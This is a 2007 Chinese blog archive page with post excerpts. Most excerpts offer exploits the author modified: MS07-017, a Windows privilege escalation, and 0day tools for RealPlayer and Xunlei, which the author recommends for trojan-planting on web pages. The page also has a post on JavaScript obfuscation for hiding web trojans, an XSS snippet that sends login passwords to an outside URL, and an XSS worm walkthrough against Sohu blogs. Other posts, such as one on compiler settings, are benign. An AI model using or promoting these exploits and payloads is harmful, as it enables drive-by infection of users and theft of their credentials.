视频在线一区,综合久久久久久久,国产一区二区日韩

搞定MDB最新溢出for win2003

posted @ 2007-11-30 03:14 009 閱讀(1087) | 評論 (0) 編輯

MS07-017 windows 2000 and windows xp sp2 真正修改能用版本(fixed) 摘要: 注：Windows2000_CN SP2(我只有這臺SP2的2k測試機)，WindowsXP_CN SP2測試通過
網上流傳的都TMD垃圾不能用，不知道抄來抄去轉來轉去哪些代碼轉錯了

這個是我自己修改過的
閱讀全文

posted @ 2007-11-26 22:47 009 閱讀(1050) | 評論 (2) 編輯

Windows Local Privilege Escalation Vulnerability Exploit 摘要: 小改了一下代碼，這下好用了

WinXP_CN SP2測試通過
Win2k3測試藍屏，注意保存文件哦閱讀全文

posted @ 2007-11-26 18:46 009 閱讀(1479) | 評論 (2) 編輯

Realplay ActiveX 0day 利用工具摘要: 注：Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 測試通過
好像10.5以下版本都中，這個似乎只能溢出一次，第一次溢出成功后，第二次開始會有realplay修復數據庫的提示，點修復就中，取消不中

上次測試使用的"Windows 按鈕突破專家" 4.5K 溢出沒問題，但是"iecv.exe"那個87K
溢出的時候老是看不到界面，其實已經執行（進程中可以看到），不知道為什么(不知道是否大小問題)

另：IE5不中，代碼中直接跳過了
閱讀全文

posted @ 2007-11-25 20:25 009 閱讀(789) | 評論 (7) 編輯

迅雷5 0day 利用工具摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影響
掛馬相當好用，只是如果用iframe，寬高不能為0
（pplayer.dll 組件版本號：1.2.3.49，CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F）
閱讀全文

posted @ 2007-11-25 20:19 009 閱讀(639) | 評論 (0) 編輯

PSP 3.52 M33-2 播放UMD Video ISO(備忘)

posted @ 2007-11-23 11:05 009 閱讀(1116) | 評論 (0) 編輯

JavaScript加密解密7種方法摘要: 本文一共介紹了七種javascript加密方法：

　　在做網頁時（其實是網頁木馬呵呵），最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運行的javascript代碼常常被別人輕易的拷貝，實在讓自己的心里有點不是滋味，要知道自己寫點東西也挺累的......^*^

　　但我們也應該清楚地認識到因為javascript代碼是在IE中解釋執行，要想絕對的保密是不可能的，我們要做的就是盡可能的增大拷貝者復制的難度，讓他知難而退（但愿~!~），下面我結合自己這幾年來的實踐，及個人研究的心得，和大家一起來探討一下網頁中javascript代碼的加密解密技術。

　　以加密下面的javascript代碼為例：
......

閱讀全文

posted @ 2007-11-16 13:42 009 閱讀(938) | 評論 (0) 編輯

Unicode編碼表/0000-0FFF

posted @ 2007-11-16 10:24 009 閱讀(19449) | 評論 (3) 編輯

VC編譯優化設置摘要: VC- Project Setting-Debug-Project Option語法解釋

-優化-
/O1 最小化空間 minimize space
/Op[-] 改善浮點數一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 優選代碼空間 favor code space
/Oa 假設沒有別名 assume no aliasing
/Ot 優選代碼速度 favor code speed
/Ob 內聯展開（默認 n=0） inline expansion (default n=0)
/Ow 假設交叉函數別名 assume cross-function aliasing
/Od 禁用優化（默認值） disable optimizations (default)
/Ox 最大化選項。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 啟用全局優化閱讀全文

posted @ 2007-11-16 10:20 009 閱讀(1896) | 評論 (0) 編輯

autorun.inf完全操作手冊(ZT) 摘要: 一、autorun.inf是windows下操縱光盤行為的一個文件，需要放在光盤根目錄下，部分操作對于硬盤也適用。
二、autorun.inf是可以被禁止的。方法如下：
點擊開始->運行，在文本框中輸入regedit或者regedt32。依次展開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer，其中的NoDriveTypeAutoRun子鍵限制著Autorun的作用范圍，默認為95（16進制）。
................
閱讀全文

posted @ 2007-11-16 10:16 009 閱讀(597) | 評論 (0) 編輯

Flash純腳本生成餅圖(ZT)

posted @ 2007-11-16 10:09 009 閱讀(442) | 評論 (0) 編輯

清空代碼防止查看源代碼(ZT)

posted @ 2007-11-16 09:45 009 閱讀(560) | 評論 (0) 編輯

一些XSS小技巧(ZT) 摘要: 1.最短的動態插入JS.
代碼:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>

2.獲取表單密碼.
代碼:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......

閱讀全文

posted @ 2007-11-08 13:11 009 閱讀(1491) | 評論 (0) 編輯

程序多開器摘要: 使用OD反匯編修改NateOn，雖然很麻煩，最終還是搞定了，后來發現網上有段代碼，直接可以實現程序多開，測試了MSN、NateOn沒問題，代碼如下：

.386
.model flat, stdcall
option casemap :none

include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............

閱讀全文

posted @ 2007-11-07 16:54 009 閱讀(774) | 評論 (0) 編輯

完整XSS wrom入侵流程(ZT) 摘要: 不說廢話，且看怎么實現，我先拿SOHU BLOG做示范.

1.測試過濾字符,下面都是構造XSS所需要的關鍵字符(未包含全角字符,空格是個TABLE,\/前是真正的空格),在個人檔案處看過濾了哪些.
’’;:!--"<javascript JAvaSCriPT>=&#{()} \/
結果
’’;:!--"=&#{()} // (&后是amp,論壇過濾了)
.........
閱讀全文

posted @ 2007-11-07 10:53 009 閱讀(442) | 評論 (0) 編輯

11 2007 檔案

公告

常用鏈接

留言簿(113)

隨筆分類

隨筆檔案

文章分類

相冊

Link

搜索

最新評論

閱讀排行榜

評論排行榜

酒水不犯茶水葉的離去，是風的追求還是樹的不挽留？
BlogJava \| 首頁 \| 發新隨筆 \| 發新文章 \| 聯系 \| 聚合 \| 管理	隨筆：325 文章：0 評論：612 引用：0